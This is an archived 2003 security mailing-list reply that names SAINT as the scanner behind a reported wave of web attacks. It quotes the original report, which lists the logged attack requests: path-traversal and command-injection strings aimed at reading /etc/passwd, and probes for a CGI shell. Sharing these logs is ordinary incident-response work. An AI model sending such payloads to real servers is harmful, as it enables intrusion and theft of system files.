The tool in question was SAINT, the successor of SATAN.. which you can find at http://www.wwdsi.com/saint/ . > -----Ursprüngliche Nachricht----- > Von: Paul [mailto:pbobbyat_private] > Gesendet: Freitag, 21. März 2003 23:15 > An: incidentsat_private > Betreff: Chinese source: some web attack tool > > > > > Getting hammered by a Chinese site, 218.88.98.237. > > Anyone else? > > They are web attacks, and here is a sample of the various attempts it > tries to make: > > GET > /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../et > c/passwd% > 00 HTTP/1.0 > GET /IISSamples/ExAir/search/query.asp HTTP/1.0 > GET /cgi-bin/sh HTTP/1.0 > GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0 > GET /search.dll?search?query=%00&logic=AND HTTP/1.0 > GET > /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd > HTTP/1.0 > > and so forth. Anyone recognize the tool? > > -------------------------------------------------------------- > -------------- > > <Pre>Lose another weekend managing your IDS? > Take back your personal time. > 15-day free trial of StillSecure Border Guard.</Pre> > <A href="http://www.securityfocus.com/stillsecure"> > http://www.securityfocus.com/stillsecure </A> > > ---------------------------------------------------------------------------- <Pre>Lose another weekend managing your IDS? Take back your personal time. 15-day free trial of StillSecure Border Guard.</Pre> <A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>
This archive was generated by hypermail 2b30 : Sun Mar 23 2003 - 10:08:09 PST